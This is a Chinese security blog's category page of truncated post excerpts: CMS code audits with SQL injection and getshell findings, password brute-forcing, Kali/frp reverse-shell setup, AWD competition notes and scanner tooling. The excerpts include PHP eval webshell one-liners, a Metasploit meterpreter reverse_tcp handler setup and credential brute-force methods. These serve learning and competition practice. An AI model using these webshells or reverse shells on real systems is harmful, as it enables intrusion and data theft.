![](https://img-blog.csdnimg.cn/20201014180756757.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web安全
whojoe
一个想学reverse的web狗
展开
-
路径发现方法
这是我理解比较好的路径发现方式、再业务场景中可以触发的请求,理论上都是真实存在的,可以实现比较高效的获取路径,但是爬虫的速率就需要去做一下平衡,这时候又会涉及到反爬的问题。特别是通过旁站对于旁站的查询,可以极好的补充对于部分站点根路径无结果导致爬虫无有效返回的问题。扫描速度和字典大小其实是比较难取舍的,难道大字典还可以更快完成么?如果字典里面包含很多公里类的路径、qps过高,就容易带来封禁的问题。那么这时候是不是可以用路径爆破来处理根路径无数据的站点呢?没有经过验证,效果大概率是不好的。原创 2023-06-24 16:53:23 · 660 阅读 · 0 评论 -
python调用js批量爆破账号密码
python调用js批量爆破账号密码前言流程爬取账号爆破参考文章前言在进行默认弱口令爆破的时候遇到了使用js对账号密码加密,而且加密算法写的比较复杂,如果用python重新写一个加密算法的话是比较麻烦的,所以就想万能的python能不能调用js的函数,直接返回输出,这样就能方便很多。流程通过在官网的html页面,通过burp修改请求包可以调整返回的账号数量和省份,之后通过python处理html代码,把我们要的东西给提取出来,保存到文件,之后再经过人工筛选,将要爆破的保存到文件,使用python进行原创 2020-06-21 09:58:42 · 503 阅读 · 0 评论 -
代码审计之_douphp20190711漏洞
douphp20190711代码审计及漏洞复现douphp20190711代码审计及漏洞复现1.安装时参数控制不严谨getshell1.1 审计过程1.2 分析漏洞2.后台任意文件删除3.遇到的坑3.1 对于文件上传进行审计3.2对于账户登录的记录的ip是否可注入的猜测4.总结4.总结douphp20190711代码审计及漏洞复现下载链接http://down.douco.com/DouPHP...原创 2020-04-12 13:31:18 · 1695 阅读 · 0 评论 -
代码审计之_wolfcms漏洞
wolfcms代码审计1.审计过程审计同样是使用主动加被动扫描,这样可以帮帮助你对一些你没有注意到的参数进行测试,特别在黑盒审计的过程中,特别有作用,当然大佬当我啥也没说。我是在这小白逗小白的。嘻嘻嘻。同样和审计douphp时,漏洞存在与安装文件配置中,没有对于是否安装进行验证,导致新配置一样可以写入到配置文件中,尽管使用了单引号包裹参数,但是没有对于数据进行全局过滤,导致了可以任意命令执行,...原创 2020-04-12 13:25:08 · 632 阅读 · 0 评论 -
代码审计之_lmxcms1.4漏洞
lmxcms1.4代码审计及漏洞复现lmxcms1.4代码审计及漏洞复现1.存在漏洞2.漏洞利用2.1.前台sql注入2.2后台任意文件删除2.3后台任意文件上传3.漏洞分析3.1前台sql注入3.2后台任意文件删除4.利用链lmxcms1.4代码审计及漏洞复现1.存在漏洞前台sql注入,后台任意文件删除,任意文件上传2.漏洞利用2.1.前台sql注入GET http://192.16...原创 2020-04-12 13:21:25 · 3184 阅读 · 2 评论 -
代码审计之_doccms2016漏洞
doccms2016代码审计及漏洞复现doccms2016代码审计及漏洞复现1.sql注入2.后台getshell3.留言处存储xss4.后台任意文件下载5.总结doccms2016代码审计及漏洞复现1.sql注入在/content/search/index.php中,首先对参数keyword进行非法字符检测<?php//首页搜索,站内关键字搜索function index()...原创 2020-04-12 13:19:54 · 1498 阅读 · 0 评论 -
如何低成本在服务器搭建kali
这里写目录标题kali frp实现反弹shell到内网msf上,同样可以作为反向代理实现内网穿透kali frp实现反弹shell到内网msf上,同样可以作为反向代理实现内网穿透1.msf启动监听use exploit/multi/handlerset payload php/meterpreter/reverse_tcpshow optionsset lhost 127.0.0.1...原创 2020-04-12 13:15:43 · 1120 阅读 · 0 评论 -
AWD总结
AWD总结1.run2.back3.usage1.run1.linux写一句话echo “<?php eval(\$_POST[‘qq’]); ?>” > qq.phpwindows写一句话echo ^<?php eval($_POST[‘qwe’]);?^> >qweqweq.php2.cat /root/flag3.数据库读取文件use joom...原创 2020-04-12 13:12:51 · 1887 阅读 · 0 评论 -
360crawlergo结合xray被动扫描
360crawlergo结合xray被动扫描安装Xrayhttps://github.com/chaitin/xraycrawlergo_x_XRAYhttps://github.com/timwhitez/crawlergo_x_XRAYcrawlergohttps://github.com/0Kee-Team/crawlergo更多的使用方法推荐大家去看官方文档配置下...原创 2020-04-12 00:23:53 · 2698 阅读 · 0 评论 -
Burpsuite与xray进行联动
Burpsuite与xray进行联动环境搭建1.Burpsuite的安装链接: Burpsuite可以直接下载Community版,或者在网上去汉化破解,具体过程可以百度2.xray一款完善的安全评估工具,支持常见 web 安全问题扫描和自定义 poc链接: xray github参数配置1.xray更多的扩展方法大家可以参考xray的官方文档2.burp在用户选项中添加...原创 2020-04-12 00:15:03 · 4579 阅读 · 0 评论